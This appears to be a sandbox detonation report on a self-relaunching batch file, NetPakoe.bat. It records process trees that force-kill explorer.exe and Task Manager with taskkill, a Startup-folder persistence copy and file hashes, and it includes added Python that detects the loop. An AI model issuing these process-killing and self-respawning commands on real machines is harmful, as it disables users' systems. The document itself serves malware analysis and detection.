memory/3652-3-0x000000001CBB0000-0x000000001CC4C000-memory.dmp
memory/3652-4-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-5-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-6-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
| MD5 | f14b989516f256db1befee3dee508f55 |
| SHA1 | fbd2c6b1d783debb9a69c5766d3672138e24e127 |
| SHA256 | c88dbbd0002395beaeaef3f855790abef3430d76307953825745339bdc1f9388 |
| SHA512 | bfa84b7837d3bcda55571710289092af7e6cb7ee48b21a2a032d24b495ddbe9259c07eeceb58fb2a5ac4482e2b120259fe5b95162eb632228c86516f41bf035e |
memory/4748-15-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3652-16-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-17-0x000000001C050000-0x000000001C058000-memory.dmp
memory/3652-18-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-19-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-20-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-21-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-22-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-23-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-24-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-25-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-27-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-26-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-28-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-29-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-30-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-31-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-32-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-33-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-34-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-35-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-36-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-37-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-38-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-39-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-41-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-40-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-42-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-43-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-44-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-45-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-47-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-46-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-48-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-49-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-50-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-51-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-52-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-53-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-54-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-55-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-56-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-57-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-58-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-59-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-60-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-62-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-61-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-63-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-64-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-66-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-65-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-67-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-68-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-69-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-70-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-71-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-72-0x0000000020680000-0x0000000020780000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:33
Platform
win7-20240221-en
Max time kernel
159s
Max time network
167s
Command Line
Signatures
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe.bat"
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
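The tree above is a batch file that relaunches itself from every generation (`cmd /K NetPakoe.bat` and `cmd /K NetPakoe`, which cmd resolves to the same script through PATHEXT) while force-killing explorer.exe, so the process list grows geometrically until the sandbox timeout. Two details matter for detection. First, the signal is the count of cmd.exe processes re-running one script and the depth of the cmd.exe chain, not any single command line. Second, `taskkill /im Task Manager.exe /F` is malformed: Task Manager's image is Taskmgr.exe, and the unquoted space means taskkill receives `Task` as the image name, so a rule keyed on exact protected-process names misses it while a rule keyed on forced kills from a script-spawned tree does not. The Python below is an added example, not part of the report: it builds a constructed approximation of this tree with invented PIDs (the report lists no PIDs for this run) and runs both checks over it. The thresholds are assumptions.

```python
"""Process-tree checks for the self-relaunching batch seen in this run.
Added example, not sandbox code.  PIDs in the sample tree are invented."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

RESPAWN_THRESHOLD = 5   # assumption: one script started by cmd.exe this often is a loop
KILL_THRESHOLD = 3      # assumption: forced kills from one tree before we care
PROTECTED = {"explorer.exe", "taskmgr.exe"}

# cmd /c or /k followed by the script as a quoted path or a bare token; cmd resolves a
# bare name such as NetPakoe through PATHEXT, so NetPakoe and NetPakoe.bat are one script.
CMD_SCRIPT_RE = re.compile(r'/[ck]\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
KILL_RE = re.compile(r"taskkill(?:\.exe)?\s+(?P<args>.*)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def script_key(cmdline: str) -> Optional[str]:
    """Normalise what cmd.exe was told to run: basename, lower-case, .bat/.cmd stripped."""
    m = CMD_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    target = (m.group(1) or m.group(2)).strip('"').rsplit("\\", 1)[-1].lower()
    return re.sub(r"\.(?:bat|cmd)$", "", target)


def forced_kill_target(cmdline: str) -> Optional[str]:
    """Image name handed to taskkill /IM when /F is present.  For the malformed
    'taskkill /im Task Manager.exe /F' this is 'task', which is why name matching alone fails."""
    m = KILL_RE.search(cmdline)
    if not m or not re.search(r"(?:^|\s)/f(?:\s|$)", m.group("args"), re.IGNORECASE):
        return None
    im = re.search(r"/im\s+(\S+)", m.group("args"), re.IGNORECASE)
    return im.group(1).lower() if im else None


def cmd_chain_depth(pid: int, by_pid: Dict[int, ProcEvent]) -> int:
    """Consecutive cmd.exe ancestors, counting pid itself."""
    depth = 0
    while pid in by_pid and by_pid[pid].image.lower().endswith("cmd.exe"):
        depth += 1
        pid = by_pid[pid].ppid
    return depth


def analyze(events: List[ProcEvent]) -> Dict[str, object]:
    by_pid = {e.pid: e for e in events}
    respawns: Counter = Counter()
    kills: List[str] = []
    max_depth = 0
    for e in events:
        img = e.image.lower()
        if img.endswith("cmd.exe"):
            key = script_key(e.cmdline)
            if key:
                respawns[key] += 1
            max_depth = max(max_depth, cmd_chain_depth(e.pid, by_pid))
        elif img.endswith("taskkill.exe"):
            target = forced_kill_target(e.cmdline)
            if target:
                kills.append(target)
    findings = [f"script '{s}' started {n} times by cmd.exe (nesting depth {max_depth}): relaunch loop"
                for s, n in respawns.items() if n >= RESPAWN_THRESHOLD]
    hit = sorted({k for k in kills if k in PROTECTED})
    if hit:
        findings.append(f"forced kill of protected process: {', '.join(hit)}")
    if len(kills) >= KILL_THRESHOLD:
        findings.append(f"{len(kills)} forced taskkill invocations in one tree")
    return {"respawns": dict(respawns), "kills": kills, "max_cmd_depth": max_depth, "findings": findings}


def build_sample_tree(generations: int = 3) -> List[ProcEvent]:
    """Constructed approximation of the behavioral25 tree: every cmd.exe generation spawns
    the same five children the report shows.  PIDs are invented."""
    events: List[ProcEvent] = []
    counter = [200]

    def spawn(ppid: int, image: str, cmdline: str) -> ProcEvent:
        counter[0] += 1
        ev = ProcEvent(counter[0], ppid, image, cmdline)
        events.append(ev)
        return ev

    frontier = [spawn(1, r"C:\Windows\system32\cmd.exe",
                      r'cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe.bat"')]
    for _ in range(generations):
        nxt = []
        for parent in frontier:
            spawn(parent.pid, r"C:\Windows\system32\taskkill.exe", "taskkill /im Task Manager.exe /F")
            spawn(parent.pid, r"C:\Windows\system32\taskkill.exe", "taskkill /im explorer.exe /F")
            nxt.append(spawn(parent.pid, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /K NetPakoe.bat"))
            nxt.append(spawn(parent.pid, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /K NetPakoe"))
            spawn(parent.pid, r"C:\Windows\explorer.exe", "explorer")
        frontier = nxt
    return events


if __name__ == "__main__":
    for line in analyze(build_sample_tree())["findings"]:
        print("-", line)
```

With three generations the constructed tree holds 36 processes, 15 of them cmd.exe re-running `netpakoe` at a nesting depth of 4, and 14 forced kills of which only the explorer.exe ones match a protected name. On real telemetry (Sysmon event 1 or EDR process-create records) the same logic applies per root process tree; the startup-folder copy of NetPakoe.bat recorded under "Drops startup file" is what makes the loop survive a reboot.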
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | 6c5a9741a170d3ac2e2c89d3e91ea6ea |
| SHA1 | 7034266eefee8c6437d966f5d91ea82e50e10d59 |
| SHA256 | 4d1a5d2255194f08a772aef2363514890ecd620dfc49e5b701fc8f2e2388e616 |
| SHA512 | 9dcf12e971da1c78d92dd7ff824d50e8487ae61bfb9dcbfea6c38f8ebba22994fde19d825e44f4632aba9e0fc34d75cd87e090b75ed78b51b908128cc22ce29c |
memory/2632-19-0x0000000000430000-0x0000000000431000-memory.dmp
memory/3064-40-0x00000000004B0000-0x00000000004B1000-memory.dmp
memory/2544-60-0x0000000000320000-0x0000000000321000-memory.dmp
memory/1508-99-0x0000000001F90000-0x0000000001F91000-memory.dmp
memory/1916-119-0x0000000002230000-0x0000000002231000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1900-135-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
memory/568-181-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1932-201-0x0000000001F90000-0x0000000001F91000-memory.dmp
memory/2000-204-0x0000000002030000-0x0000000002031000-memory.dmp
memory/2812-221-0x00000000022B0000-0x00000000022B1000-memory.dmp
memory/1544-254-0x0000000002050000-0x0000000002051000-memory.dmp
memory/1368-278-0x0000000002010000-0x0000000002011000-memory.dmp
memory/2712-295-0x00000000004B0000-0x00000000004B1000-memory.dmp
memory/824-315-0x0000000002130000-0x0000000002131000-memory.dmp
memory/2736-323-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
